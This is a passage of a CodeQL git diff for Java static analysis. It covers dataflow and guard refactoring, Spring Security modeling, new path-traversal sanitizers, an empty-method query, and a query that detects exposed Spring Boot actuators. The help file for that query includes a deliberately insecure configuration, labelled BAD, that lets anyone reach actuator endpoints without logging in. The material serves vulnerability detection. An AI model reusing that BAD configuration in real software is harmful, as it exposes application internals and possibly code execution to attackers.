v.getEnclosingCallable() = p.getCallable() - ) + predicate ssaDefHasSource(WriteDefinition def) { + def instanceof SsaExplicitUpdate or def.(SsaImplicitInit).isParameterDefinition(_) } predicate allowFlowIntoUncertainDef(UncertainWriteDefinition def) { @@ -669,22 +656,27 @@ private module DataFlowIntegrationInput implements Impl::DataFlowIntegrationInpu } class Guard extends Guards::Guard { - predicate hasCfgNode(BasicBlock bb, int i) { - this = bb.getNode(i).asExpr() - or - this = bb.getNode(i).asStmt() + /** + * Holds if the control flow branching from `bb1` is dependent on this guard, + * and that the edge from `bb1` to `bb2` corresponds to the evaluation of this + * guard to `branch`. + */ + predicate controlsBranchEdge(BasicBlock bb1, BasicBlock bb2, boolean branch) { + super.hasBranchEdge(bb1, bb2, branch) } } + /** Holds if the guard `guard` directly controls block `bb` upon evaluating to `branch`. */ + predicate guardDirectlyControlsBlock(Guard guard, BasicBlock bb, boolean branch) { + guard.directlyControls(bb, branch) + } + /** Holds if the guard `guard` controls block `bb` upon evaluating to `branch`. */ predicate guardControlsBlock(Guard guard, BasicBlock bb, boolean branch) { guard.controls(bb, branch) } - /** Gets an immediate conditional successor of basic block `bb`, if any. */ - BasicBlock getAConditionalBasicBlockSuccessor(BasicBlock bb, boolean branch) { - result = bb.(Guards::ConditionBlock).getTestSuccessor(branch) - } + predicate includeWriteDefsInFlowStep() { none() } } private module DataFlowIntegrationImpl = Impl::DataFlowIntegration; diff --git a/java/ql/lib/semmle/code/java/environment/SystemProperty.qll b/java/ql/lib/semmle/code/java/environment/SystemProperty.qll index 63ded626c115..bee91d7c6b7f 100644 --- a/java/ql/lib/semmle/code/java/environment/SystemProperty.qll +++ b/java/ql/lib/semmle/code/java/environment/SystemProperty.qll @@ -269,18 +269,24 @@ private MethodCall getSystemPropertyFromSpringProperties(string propertyName) { * for final variables. */ private predicate localExprFlowPlusInitializers(Expr e1, Expr e2) { + e1 = e2 or localFlowPlusInitializers(DataFlow::exprNode(e1), DataFlow::exprNode(e2)) } +private predicate localFlowPlusInitializers(DataFlow::Node pred, DataFlow::Node succ) = + fastTC(localFlowStepPlusInitializers/2)(pred, succ) + /** - * Holds if data can flow from `pred` to `succ` in zero or more - * local (intra-procedural) steps or via instance or static variable intializers + * Holds if data can flow from `pred` to `succ` in a + * local (intra-procedural) step or via instance or static variable intializers * for final variables. */ -private predicate localFlowPlusInitializers(DataFlow::Node pred, DataFlow::Node succ) { - exists(Variable v | v.isFinal() and pred.asExpr() = v.getInitializer() | - DataFlow::localFlow(DataFlow::exprNode(v.getAnAccess()), succ) +private predicate localFlowStepPlusInitializers(DataFlow::Node pred, DataFlow::Node succ) { + exists(Variable v | + v.isFinal() and + pred.asExpr() = v.getInitializer() and + succ.asExpr() = v.getAnAccess() ) or - DataFlow::localFlow(pred, succ) + DataFlow::localFlowStep(pred, succ) } diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringBoot.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringBoot.qll new file mode 100644 index 000000000000..d77e4549e4e7 --- /dev/null +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringBoot.qll @@ -0,0 +1,24 @@ +/** + * Provides classes for working with Spring classes and interfaces from + * `org.springframework.boot.*`. + */ + +import java + +/** + * The class `org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest`. + */ +class SpringEndpointRequest extends Class { + SpringEndpointRequest() { + this.hasQualifiedName("org.springframework.boot.actuate.autoconfigure.security.servlet", + "EndpointRequest") + } +} + +/** A call to `EndpointRequest.toAnyEndpoint` method. */ +class SpringToAnyEndpointCall extends MethodCall { + SpringToAnyEndpointCall() { + this.getMethod().hasName("toAnyEndpoint") and + this.getMethod().getDeclaringType() instanceof SpringEndpointRequest + } +} diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll new file mode 100644 index 000000000000..835b679d50a6 --- /dev/null +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll @@ -0,0 +1,124 @@ +/** + * Provides classes for working with Spring classes and interfaces from + * `org.springframework.security.*`. + */ + +import java + +/** The class `org.springframework.security.config.annotation.web.builders.HttpSecurity`. */ +class SpringHttpSecurity extends Class { + SpringHttpSecurity() { + this.hasQualifiedName("org.springframework.security.config.annotation.web.builders", + "HttpSecurity") + } +} + +/** + * The class + * `org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer$AuthorizedUrl` + * or the class + * `org.springframework.security.config.annotation.web.configurers.AuthorizeHttpRequestsConfigurer$AuthorizedUrl`. + */ +class SpringAuthorizedUrl extends Class { + SpringAuthorizedUrl() { + this.hasQualifiedName("org.springframework.security.config.annotation.web.configurers", + [ + "ExpressionUrlAuthorizationConfigurer$AuthorizedUrl<>", + "AuthorizeHttpRequestsConfigurer$AuthorizedUrl<>" + ]) + } +} + +/** + * The class `org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry`. + */ +class SpringAbstractRequestMatcherRegistry extends Class { + SpringAbstractRequestMatcherRegistry() { + this.hasQualifiedName("org.springframework.security.config.annotation.web", + "AbstractRequestMatcherRegistry>") + } +} + +/** + * A call to the `HttpSecurity.authorizeRequests` method. + * + * Note: this method is deprecated and scheduled for removal + * in Spring Security 7.0. + */ +class SpringAuthorizeRequestsCall extends MethodCall { + SpringAuthorizeRequestsCall() { + this.getMethod().hasName("authorizeRequests") and + this.getMethod().getDeclaringType() instanceof SpringHttpSecurity + } +} + +/** + * A call to the `HttpSecurity.authorizeHttpRequests` method. + * + * Note: the no-argument version of this method is deprecated + * and scheduled for removal in Spring Security 7.0. + */ +class SpringAuthorizeHttpRequestsCall extends MethodCall { + SpringAuthorizeHttpRequestsCall() { + this.getMethod().hasName("authorizeHttpRequests") and + this.getMethod().getDeclaringType() instanceof SpringHttpSecurity + } +} + +/** + * A call to the `HttpSecurity.requestMatcher` method. + * + * Note: this method was removed in Spring Security 6.0. + * It was replaced by `securityMatcher`. + */ +class SpringRequestMatcherCall extends MethodCall { + SpringRequestMatcherCall() { + this.getMethod().hasName("requestMatcher") and + this.getMethod().getDeclaringType() instanceof SpringHttpSecurity + } +} + +/** + * A call to the `HttpSecurity.requestMatchers` method. + * + * Note: this method was removed in Spring Security 6.0. + * It was replaced by `securityMatchers`. + */ +class SpringRequestMatchersCall extends MethodCall { + SpringRequestMatchersCall() { + this.getMethod().hasName("requestMatchers") and + this.getMethod().getDeclaringType() instanceof SpringHttpSecurity + } +} + +/** A call to the `HttpSecurity.securityMatcher` method. */ +class SpringSecurityMatcherCall extends MethodCall { + SpringSecurityMatcherCall() { + this.getMethod().hasName("securityMatcher") and + this.getMethod().getDeclaringType() instanceof SpringHttpSecurity + } +} + +/** A call to the `HttpSecurity.securityMatchers` method. */ +class SpringSecurityMatchersCall extends MethodCall { + SpringSecurityMatchersCall() { + this.getMethod().hasName("securityMatchers") and + this.getMethod().getDeclaringType() instanceof SpringHttpSecurity + } +} + +/** A call to the `AuthorizedUrl.permitAll` method. */ +class SpringPermitAllCall extends MethodCall { + SpringPermitAllCall() { + this.getMethod().hasName("permitAll") and + this.getMethod().getDeclaringType() instanceof SpringAuthorizedUrl + } +} + +/** A call to the `AbstractRequestMatcherRegistry.anyRequest` method. */ +class SpringAnyRequestCall extends MethodCall { + SpringAnyRequestCall() { + this.getMethod().hasName("anyRequest") and + this.getMethod().getDeclaringType() instanceof SpringAbstractRequestMatcherRegistry + } +} diff --git a/java/ql/lib/semmle/code/java/security/ImproperIntentVerificationQuery.qll b/java/ql/lib/semmle/code/java/security/ImproperIntentVerificationQuery.qll index 995f10ad3c9a..ff5ebe862178 100644 --- a/java/ql/lib/semmle/code/java/security/ImproperIntentVerificationQuery.qll +++ b/java/ql/lib/semmle/code/java/security/ImproperIntentVerificationQuery.qll @@ -51,7 +51,9 @@ private module VerifiedIntentFlow = DataFlow::Global; /** An `onReceive` method that doesn't verify the action of the intent it receives. */ private class UnverifiedOnReceiveMethod extends OnReceiveMethod { UnverifiedOnReceiveMethod() { - not VerifiedIntentFlow::flow(DataFlow::parameterNode(this.getIntentParameter()), _) + not VerifiedIntentFlow::flow(DataFlow::parameterNode(this.getIntentParameter()), _) and + // Empty methods do not need to be verified since they do not perform any actions. + this.getBody().getNumStmt() > 0 } } diff --git a/java/ql/lib/semmle/code/java/security/PathSanitizer.qll b/java/ql/lib/semmle/code/java/security/PathSanitizer.qll index cd173823f2dc..8b08b5a78f2f 100644 --- a/java/ql/lib/semmle/code/java/security/PathSanitizer.qll +++ b/java/ql/lib/semmle/code/java/security/PathSanitizer.qll @@ -383,3 +383,178 @@ private class FileConstructorChildArgumentStep extends AdditionalTaintStep { ) } } + +/** A call to `java.lang.String.replace` or `java.lang.String.replaceAll`. */ +private class StringReplaceOrReplaceAllCall extends MethodCall { + StringReplaceOrReplaceAllCall() { + this instanceof StringReplaceCall or + this instanceof StringReplaceAllCall + } +} + +/** Gets a character used for replacement. */ +private string getAReplacementChar() { result = ["", "_", "-"] } + +/** Gets a directory character represented as regex. */ +private string getADirRegexChar() { result = ["\\.", "/", "\\\\"] } + +/** Gets a directory character represented as a char. */ +private string getADirChar() { result = [".", "/", "\\"] } + +/** Holds if `target` is the first argument of `replaceAllCall`. */ +private predicate isReplaceAllTarget( + StringReplaceAllCall replaceAllCall, CompileTimeConstantExpr target +) { + target = replaceAllCall.getArgument(0) +} + +/** Holds if `target` is the first argument of `replaceCall`. */ +private predicate isReplaceTarget(StringReplaceCall replaceCall, CompileTimeConstantExpr target) { + target = replaceCall.getArgument(0) +} + +/** Holds if a single `replaceAllCall` replaces all directory characters. */ +private predicate replacesDirectoryCharactersWithSingleReplaceAll( + StringReplaceAllCall replaceAllCall +) { + exists(CompileTimeConstantExpr target, string targetValue | + isReplaceAllTarget(replaceAllCall, target) and + target.getStringValue() = targetValue and + replaceAllCall.getArgument(1).(CompileTimeConstantExpr).getStringValue() = getAReplacementChar() + | + not targetValue.matches("%[^%]%") and + targetValue.matches("[%.%]") and + targetValue.matches("[%/%]") and + // Search for "\\\\" (needs extra backslashes to avoid escaping the '%') + targetValue.matches("[%\\\\\\\\%]") + or + targetValue.matches("%|%") and + targetValue.matches("%" + ["[.]", "\\."] + "%") and + targetValue.matches("%/%") and + targetValue.matches("%\\\\\\\\%") + ) +} + +/** + * Holds if there are two chained replacement calls, `rc1` and `rc2`, that replace + * '.' and one of '/' or '\'. + */ +private predicate replacesDirectoryCharactersWithDoubleReplaceOrReplaceAll( + StringReplaceOrReplaceAllCall rc1 +) { + exists( + CompileTimeConstantExpr target1, string targetValue1, StringReplaceOrReplaceAllCall rc2, + CompileTimeConstantExpr target2, string targetValue2 + | + rc1 instanceof StringReplaceAllCall and + isReplaceAllTarget(rc1, target1) and + isReplaceAllTarget(rc2, target2) and + targetValue1 = getADirRegexChar() and + targetValue2 = getADirRegexChar() + or + rc1 instanceof StringReplaceCall and + isReplaceTarget(rc1, target1) and + isReplaceTarget(rc2, target2) and + targetValue1 = getADirChar() and + targetValue2 = getADirChar() + | + rc2.getQualifier() = rc1 and + target1.getStringValue() = targetValue1 and + target2.getStringValue() = targetValue2 and + rc1.getArgument(1).(CompileTimeConstantExpr).getStringValue() = getAReplacementChar() and + rc2.getArgument(1).(CompileTimeConstantExpr).getStringValue() = getAReplacementChar() and + // make sure the calls replace different characters + targetValue2 != targetValue1 and + // make sure one of the calls replaces '.' + // then the other call must replace one of '/' or '\' if they are not equal + (targetValue2.matches("%.%") or targetValue1.matches("%.%")) + ) +} + +/** + * A sanitizer that protects against path injection vulnerabilities by replacing + * directory characters ('..', '/', and '\') with safe characters. + */ +private class ReplaceDirectoryCharactersSanitizer extends StringReplaceOrReplaceAllCall { + ReplaceDirectoryCharactersSanitizer() { + replacesDirectoryCharactersWithSingleReplaceAll(this) or + replacesDirectoryCharactersWithDoubleReplaceOrReplaceAll(this) + } +} + +/** Holds if `target` is the first argument of `matchesCall`. */ +private predicate isMatchesTarget(StringMatchesCall matchesCall, CompileTimeConstantExpr target) { + target = matchesCall.getArgument(0) +} + +/** + * Holds if `matchesCall` confirms that `checkedExpr` does not contain any directory characters + * on the given `branch`. + */ +private predicate isMatchesCall(StringMatchesCall matchesCall, Expr checkedExpr, boolean branch) { + exists(CompileTimeConstantExpr target, string targetValue | + isMatchesTarget(matchesCall, target) and + target.getStringValue() = targetValue and + checkedExpr = matchesCall.getQualifier() + | + ( + // Allow anything except `.`, '/', '\' + targetValue.matches(["[%]*", "[%]+", "[%]{%}"]) and + ( + // Note: we do not account for when '.', '/', '\' are inside a character range + not targetValue.matches("[%" + [".", "/", "\\\\\\\\"] + "%]%") and + not targetValue.matches("%[^%]%") + or + targetValue.matches("[^%.%]%") and + targetValue.matches("[^%/%]%") and + targetValue.matches("[^%\\\\\\\\%]%") + ) and + branch = true + or + // Disallow `.`, '/', '\' + targetValue.matches([".*[%].*", ".+[%].+"]) and + targetValue.matches("%[%.%]%") and + targetValue.matches("%[%/%]%") and + targetValue.matches("%[%\\\\\\\\%]%") and + not targetValue.matches("%[^%]%") and + branch = false + ) + ) +} + +/** + * A guard that protects against path traversal by looking for patterns + * that exclude directory characters: `..`, '/', and '\'. + */ +private class DirectoryCharactersGuard extends PathGuard { + Expr checkedExpr; + boolean branch; + + DirectoryCharactersGuard() { isMatchesCall(this, checkedExpr, branch) } + + override Expr getCheckedExpr() { result = checkedExpr } + + boolean getBranch() { result = branch } +} + +/** + * Holds if `g` is a guard that considers a path safe because it is checked to make + * sure it does not contain any directory characters: '..', '/', and '\'. + */ +private predicate directoryCharactersGuard(Guard g, Expr e, boolean branch) { + branch = g.(DirectoryCharactersGuard).getBranch() and + localTaintFlowToPathGuard(e, g) +} + +/** + * A sanitizer that protects against path injection vulnerabilities + * by ensuring that the path does not contain any directory characters: + * '..', '/', and '\'. + */ +private class DirectoryCharactersSanitizer extends PathInjectionSanitizer { + DirectoryCharactersSanitizer() { + this.asExpr() instanceof ReplaceDirectoryCharactersSanitizer or + this = DataFlow::BarrierGuard::getABarrierNode() or + this = ValidationMethod::getAValidatedNode() + } +} diff --git a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll new file mode 100644 index 000000000000..68c20adabdd1 --- /dev/null +++ b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll @@ -0,0 +1,110 @@ +/** Provides classes and predicates to reason about exposed actuators in Spring Boot. */ + +import java +private import semmle.code.java.frameworks.spring.SpringSecurity +private import semmle.code.java.frameworks.spring.SpringBoot + +/** + * A call to an `HttpSecurity` matcher method with argument + * `EndpointRequest.toAnyEndpoint()`. + */ +private class HttpSecurityMatcherCall extends MethodCall { + HttpSecurityMatcherCall() { + ( + this instanceof SpringRequestMatcherCall or + this instanceof SpringSecurityMatcherCall + ) and + this.getArgument(0) instanceof SpringToAnyEndpointCall + } +} + +/** + * A call to an `HttpSecurity` matchers method with lambda + * argument `EndpointRequest.toAnyEndpoint()`. + */ +private class HttpSecurityMatchersCall extends MethodCall { + HttpSecurityMatchersCall() { + ( + this instanceof SpringRequestMatchersCall or + this instanceof SpringSecurityMatchersCall + ) and + this.getArgument(0).(LambdaExpr).getExprBody() instanceof SpringToAnyEndpointCall + } +} + +/** + * A call to an `AbstractRequestMatcherRegistry.requestMatchers` method with + * argument `EndpointRequest.toAnyEndpoint()`. + */ +private class RegistryRequestMatchersCall extends MethodCall { + RegistryRequestMatchersCall() { + this.getMethod().hasName("requestMatchers") and + this.getMethod().getDeclaringType() instanceof SpringAbstractRequestMatcherRegistry and + this.getAnArgument() instanceof SpringToAnyEndpointCall + } +} + +/** A call to an `HttpSecurity` method that authorizes requests. */ +private class AuthorizeCall extends MethodCall { + AuthorizeCall() { + this instanceof SpringAuthorizeRequestsCall or + this instanceof SpringAuthorizeHttpRequestsCall + } +} + +/** Holds if `permitAllCall` is called on request(s) mapped to actuator endpoint(s). */ +predicate permitsSpringBootActuators(SpringPermitAllCall permitAllCall) { + exists(AuthorizeCall authorizeCall | + // .requestMatcher(EndpointRequest).authorizeRequests([...]).[...] + authorizeCall.getQualifier() instanceof HttpSecurityMatcherCall + or + // .requestMatchers(matcher -> EndpointRequest).authorizeRequests([...]).[...] + authorizeCall.getQualifier() instanceof HttpSecurityMatchersCall + | + // [...].authorizeRequests(r -> r.anyRequest().permitAll()) or + // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) + authorizeCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and + ( + permitAllCall.getQualifier() instanceof SpringAnyRequestCall or + permitAllCall.getQualifier() instanceof RegistryRequestMatchersCall + ) + or + // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or + // [...].authorizeRequests().anyRequest().permitAll() + authorizeCall.getNumArgument() = 0 and + exists(RegistryRequestMatchersCall registryRequestMatchersCall | + registryRequestMatchersCall.getQualifier() = authorizeCall and + permitAllCall.getQualifier() = registryRequestMatchersCall + ) + or + exists(SpringAnyRequestCall anyRequestCall | + anyRequestCall.getQualifier() = authorizeCall and + permitAllCall.getQualifier() = anyRequestCall + ) + ) + or + exists(AuthorizeCall authorizeCall | + // http.authorizeRequests([...]).[...] + authorizeCall.getQualifier() instanceof VarAccess + | + // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) + authorizeCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and + permitAllCall.getQualifier() instanceof RegistryRequestMatchersCall + or + // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or + authorizeCall.getNumArgument() = 0 and + exists(RegistryRequestMatchersCall registryRequestMatchersCall | + registryRequestMatchersCall.getQualifier() = authorizeCall and + permitAllCall.getQualifier() = registryRequestMatchersCall + ) + or + exists(Variable v, HttpSecurityMatcherCall matcherCall | + // http.securityMatcher(EndpointRequest.toAnyEndpoint()); + // http.authorizeRequests([...].permitAll()) + v.getAnAccess() = authorizeCall.getQualifier() and + v.getAnAccess() = matcherCall.getQualifier() and + authorizeCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and + permitAllCall.getQualifier() instanceof SpringAnyRequestCall + ) + ) +} diff --git a/java/ql/src/CHANGELOG.md b/java/ql/src/CHANGELOG.md index 8e463d79fb99..d27571c724db 100644 --- a/java/ql/src/CHANGELOG.md +++ b/java/ql/src/CHANGELOG.md @@ -1,3 +1,19 @@ +## 1.4.0 + +### New Queries + +* Added a new quality query, `java/empty-method`, to detect empty methods. +* The query `java/spring-boot-exposed-actuators` has been promoted from experimental to the main query pack. Its results will now appear by default, and the query itself will be removed from the [CodeQL Community Packs](https://github.com/GitHubSecurityLab/CodeQL-Community-Packs). This query was originally submitted as an experimental query [by @ggolawski](https://github.com/github/codeql/pull/2901). + +### Major Analysis Improvements + +* Updated the `java/unreleased-lock` query so that it no longer report alerts in cases where a boolean variable is used to track lock state. + +### Minor Analysis Improvements + +* Fixed a false positive in "Time-of-check time-of-use race condition" (`java/toctou-race-condition`) where a field of a non-static class was not considered always-locked if it was accessed in a constructor. +* Overrides of `BroadcastReceiver::onReceive` with no statements in their body are no longer considered unverified by the `java/improper-intent-verification` query. This will reduce false positives from `onReceive` methods which do not perform any actions. + ## 1.3.1 No user-facing changes. diff --git a/java/ql/src/Language Abuse/EmptyMethod.md b/java/ql/src/Language Abuse/EmptyMethod.md new file mode 100644 index 000000000000..e4042973681c --- /dev/null +++ b/java/ql/src/Language Abuse/EmptyMethod.md @@ -0,0 +1,40 @@ +## Overview + +An empty method may indicate that an implementation was intended to be provided but was accidentally omitted. When using the method, it will not be clear that it does not provide an implementation and with dynamic dispatch, resolving to a blank method may result in unexpected program behavior. + +## Recommendation + +If a method is intended to be left empty, do one of the following to indicate that it is intentionally empty: +1. Mark it abstract in an abstract class +2. Place it in an interface (then it can be implicitly abstract) +3. Place a comment in that method that lets others know that the implementation was intentionally omitted +4. Add `UnsupportedOperationException` to the method (as in `java.util.Collection.add`). + +## Example + +```java +public class Test { + public void f1() { // COMPLIANT + // intentionally empty + } + + public void f2() {} // NON_COMPLIANT + + public void f3(){ throw new UnsupportedOperationException(); } // COMPLIANT + + public abstract class TestInner { + + public abstract void f(); // COMPLIANT - intentionally empty + } + +} +``` + +## Implementation Notes + +The rule excludes reporting methods that are annotated. + +## References +- Java SE Documentation: [java.util.Collection.add](https://docs.oracle.com/en/java/javase/20/docs/api/java.base/java/util/Collection.html#add(E)). +- Wikipedia: [Template method pattern](https://en.wikipedia.org/wiki/Template_method_pattern). +- Common Weakness Enumeration: [CWE-1071](https://cwe.mitre.org/data/definitions/1071.html). diff --git a/java/ql/src/Language Abuse/EmptyMethod.ql b/java/ql/src/Language Abuse/EmptyMethod.ql new file mode 100644 index 000000000000..f8e2d350eec4 --- /dev/null +++ b/java/ql/src/Language Abuse/EmptyMethod.ql @@ -0,0 +1,41 @@ +/** + * @id java/empty-method + * @name Empty method + * @description An empty method serves no purpose and makes code less readable. An empty method may + * indicate an error on the part of the developer. + * @kind problem + * @precision medium + * @problem.severity recommendation + * @tags correctness + * maintainability + * readability + * quality + * external/cwe/cwe-1071 + */ + +import java + +/** + * A `Method` from source that is not abstract, and likely not a test method + */ +class NonAbstractSource extends Method { + NonAbstractSource() { + this.fromSource() and + not this.isAbstract() and + not this instanceof LikelyTestMethod + } +} + +from NonAbstractSource m +where + //empty + not exists(m.getBody().getAChild()) and + //permit comment lines explaining why this is empty + m.getNumberOfCommentLines() = 0 and + //permit a javadoc above as well as sufficient reason to leave empty + not exists(m.getDoc().getJavadoc()) and + //annotated methods are considered compliant + not exists(m.getAnAnnotation()) and + //native methods have no body + not m.isNative() +select m, "Empty method found." diff --git a/java/ql/src/Likely Bugs/Concurrency/UnreleasedLock.ql b/java/ql/src/Likely Bugs/Concurrency/UnreleasedLock.ql index d46acc6aee06..73c66c664f1a 100644 --- a/java/ql/src/Likely Bugs/Concurrency/UnreleasedLock.ql +++ b/java/ql/src/Likely Bugs/Concurrency/UnreleasedLock.ql @@ -118,6 +118,26 @@ predicate heldByCurrentThreadCheck(LockType t, BasicBlock checkblock, BasicBlock ) } +/** + * Holds if there is a variable access in `checkblock` that has `falsesucc` as the false successor. + * + * The variable access must have an assigned value that is a lock access on `t`, and + * the true successor of `checkblock` must contain an unlock access. + */ +predicate variableLockStateCheck(LockType t, BasicBlock checkblock, BasicBlock falsesucc) { + exists(ConditionBlock conditionBlock, VarAccess v | + v.getType() instanceof BooleanType and + // Ensure that a lock access is assigned to the variable + v.getVariable().getAnAssignedValue() = t.getLockAccess() and + // Ensure that the `true` successor of the condition block contains an unlock access + conditionBlock.getTestSuccessor(true) = t.getUnlockAccess().getBasicBlock() and + conditionBlock.getCondition() = v + | + conditionBlock.getBasicBlock() = checkblock and + conditionBlock.getTestSuccessor(false) = falsesucc + ) +} + /** * A control flow path from a locking call in `src` to `b` such that the number of * locks minus the number of unlocks along the way is positive and equal to `locks`. @@ -131,8 +151,9 @@ predicate blockIsLocked(LockType t, BasicBlock src, BasicBlock b, int locks) { // The number of net locks from the `src` block to the predecessor block `pred` is `predlocks`. blockIsLocked(t, src, pred, predlocks) and // The recursive call ensures that at least one lock is held, so do not consider the false - // successor of the `isHeldByCurrentThread()` check. + // successor of the `isHeldByCurrentThread()` check or of `variableLockStateCheck`. not heldByCurrentThreadCheck(t, pred, b) and + not variableLockStateCheck(t, pred, b) and // Count a failed lock as an unlock so the net is zero. (if failedLock(t, pred, b) then failedlock = 1 else failedlock = 0) and ( diff --git a/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.java b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.java new file mode 100644 index 000000000000..5f61127db288 --- /dev/null +++ b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.java @@ -0,0 +1,25 @@ +@Configuration(proxyBeanMethods = false) +public class CustomSecurityConfiguration { + + @Bean + public SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception { + // BAD: Unauthenticated access to Spring Boot actuator endpoints is allowed + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + http.authorizeHttpRequests((requests) -> requests.anyRequest().permitAll()); + return http.build(); + } + +} + +@Configuration(proxyBeanMethods = false) +public class CustomSecurityConfiguration { + + @Bean + public SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception { + // GOOD: only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + http.authorizeHttpRequests((requests) -> requests.anyRequest().hasRole("ENDPOINT_ADMIN")); + return http.build(); + } + +} diff --git a/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.qhelp b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.qhelp new file mode 100644 index 000000000000..97ced3576f66 --- /dev/null +++ b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.qhelp @@ -0,0 +1,36 @@ + + + +

    Spring Boot includes features called actuators that let you monitor and interact with your +web application. Exposing unprotected actuator endpoints can lead to information disclosure or +even to remote code execution.

    +     + + +

    Since actuator endpoints may contain sensitive information, carefully consider when to expose them, +and secure them as you would any sensitive URL. Actuators are secured by default when using Spring +Security without a custom configuration. If you wish to define a custom security configuration, +consider only allowing users with certain roles to access these endpoints. +

    + +     + + +

    In the first example, the custom security configuration allows unauthenticated access to all +actuator endpoints. This may lead to sensitive information disclosure and should be avoided.

    + +

    In the second example, only users with ENDPOINT_ADMIN role are allowed to access +the actuator endpoints.

    + + +     + + +
  • +Spring Boot Reference Documentation: +Endpoints. +
    • +     +     diff --git a/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.ql b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.ql new file mode 100644 index 000000000000..1e0944062a01 --- /dev/null +++ b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.ql @@ -0,0 +1,20 @@ +/** + * @name Exposed Spring Boot actuators + * @description Exposing Spring Boot actuators may lead to information leak from the internal application, + * or even to remote code execution. + * @kind problem + * @problem.severity error + * @security-severity 6.5 + * @precision high + * @id java/spring-boot-exposed-actuators + * @tags security + * external/cwe/cwe-200 + */ + +import java +import semmle.code.java.frameworks.spring.SpringSecurity +import semmle.code.java.security.SpringBootActuatorsQuery + +from SpringPermitAllCall permitAllCall +where permitsSpringBootActuators(permitAllCall) +select permitAllCall, "Unauthenticated access to Spring Boot actuator is allowed." diff --git a/java/ql/src/Security/CWE/CWE-327/MaybeBrokenCryptoAlgorithm.ql b/java/ql/src/Security/CWE/CWE-327/MaybeBrokenCryptoAlgorithm.ql index d9decc0fe6d2..19824e0b01e8 100644 --- a/java/ql/src/Security/CWE/CWE-327/MaybeBrokenCryptoAlgorithm.ql +++ b/java/ql/src/Security/CWE/CWE-327/MaybeBrokenCryptoAlgorithm.ql @@ -23,5 +23,5 @@ where sink.getNode().asExpr() = c.getAlgoSpec() and InsecureCryptoFlow::flowPath(source, sink) select c, source, sink, - "Cryptographic algorithm $@ may not be secure, consider using a different algorithm.", source, + "Cryptographic algorithm $@ may not be secure. Consider using a different algorithm.", source, source.getNode().asExpr().(InsecureAlgorithm).getStringValue() diff --git a/java/ql/src/Security/CWE/CWE-367/TOCTOURace.ql b/java/ql/src/Security/CWE/CWE-367/TOCTOURace.ql index ca2c948867f8..868085524337 100644 --- a/java/ql/src/Security/CWE/CWE-367/TOCTOURace.ql +++ b/java/ql/src/Security/CWE/CWE-367/TOCTOURace.ql @@ -54,30 +54,34 @@ class PossiblyConcurrentCallable extends Callable { } } +private VarAccess getANonInitializationAccess(Field f) { + result = f.getAnAccess() and + exists(Callable c | c = result.getEnclosingCallable() | + not ( + c = f.getDeclaringType().getACallable() and + (c instanceof Constructor or c instanceof InitializerMethod) + ) + ) +} + /** * Holds if all accesses to `v` (outside of initializers) are locked in the same way. */ predicate alwaysLocked(Field f) { exists(Variable lock | - forex(VarAccess access | - access = f.getAnAccess() and not access.getEnclosingCallable() instanceof InitializerMethod - | + forex(VarAccess access | access = getANonInitializationAccess(f) | locallySynchronizedOn(access, _, lock) ) ) or exists(RefType thisType | - forex(VarAccess access | - access = f.getAnAccess() and not access.getEnclosingCallable() instanceof InitializerMethod - | + forex(VarAccess access | access = getANonInitializationAccess(f) | locallySynchronizedOnThis(access, thisType) ) ) or exists(RefType classType | - forex(VarAccess access | - access = f.getAnAccess() and not access.getEnclosingCallable() instanceof InitializerMethod - | + forex(VarAccess access | access = getANonInitializationAccess(f) | locallySynchronizedOnClass(access, classType) ) ) diff --git a/java/ql/src/change-notes/released/1.4.0.md b/java/ql/src/change-notes/released/1.4.0.md new file mode 100644 index 000000000000..bc86e5de425b --- /dev/null +++ b/java/ql/src/change-notes/released/1.4.0.md @@ -0,0 +1,15 @@ +## 1.4.0 + +### New Queries + +* Added a new quality query, `java/empty-method`, to detect empty methods. +* The query `java/spring-boot-exposed-actuators` has been promoted from experimental to the main query pack. Its results will now appear by default, and the query itself will be removed from the [CodeQL Community Packs](https://github.com/GitHubSecurityLab/CodeQL-Community-Packs). This query was originally submitted as an experimental query [by @ggolawski](https://github.com/github/codeql/pull/2901). + +### Major Analysis Improvements + +* Updated the `java/unreleased-lock` query so that it no longer report alerts in cases where a boolean variable is used to track lock state. + +### Minor Analysis Improvements + +* Fixed a false positive in "Time-of-check time-of-use race condition" (`java/toctou-race-condition`) where a field of a non-static class was not considered always-locked if it was accessed in a constructor. +* Overrides of `BroadcastReceiver::onReceive` with no statements in their body are no longer considered unverified by the `java/improper-intent-verification` query. This will reduce false positives from `onReceive` methods which do not perform any actions. diff --git a/java/ql/src/codeql-pack.release.yml b/java/ql/src/codeql-pack.release.yml index e71b6d081f15..b8b2e97d5086 100644 --- 